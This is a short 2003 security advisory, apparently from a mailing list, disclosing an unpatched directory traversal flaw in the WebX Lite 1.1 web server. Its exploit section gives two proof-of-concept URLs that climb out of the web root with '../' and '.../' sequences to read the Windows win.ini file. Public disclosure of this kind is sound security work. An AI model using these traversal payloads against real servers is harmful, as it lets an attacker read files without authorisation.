WebX.txt

`hello,  
  
i am sending you a security advisory for WebX lite 1.1 web server.  
  
----  
  
-=- Freedom of Voice - Freedom of Choice =-  
  
------------------------------------------------------------------  
http://members.lycos.co.uk/r34ct/ security advisory  
------------------------------------------------------------------  
  
  
dr_insane - [email protected]  
September 8, 2003  
  
  
  
Vunerability:  
----------------  
1) Directory Traversal attacks  
  
Product:  
--------  
WebX Lite 1.1 web server  
WebX 1.1 web server  
  
Description of product:  
-----------------------  
Using WebX Lite could not be simpler. First set the basic parameters of a web server, choose the Server Port and the Virtual Path where you web pages are located. Then start the server. That is it.  
  
You can easily add web based administration/configuration, client access, and reporting features to existing applications while reusing existing subroutines, functions and classes. And the best part, you can do all this while still working in the development environment of your choice, whether it is Visual Basic, Visual C++, Delphi, or any environment that supports ActiveX controls.  
  
  
VUNERABILITY / EXPLOIT  
======================  
  
where to start...  
  
  
1) http://[target]/../../../../../../../../../../windows/win.ini  
2)http://[target]/.../.../.../.../.../.../.../windows/win.ini  
  
  
Local:  
------  
not realy  
  
Remote:  
-------  
real bad  
  
  
  
Vendor Fix:  
-----------  
Not yet  
  
Vendor Contact:  
---------------  
http://www.futurewavetech.com/  
[email protected]  
  
  
Credits:  
--------  
dr_insane  
http://members.lycos.co.uk/r34ct/  
  
  
`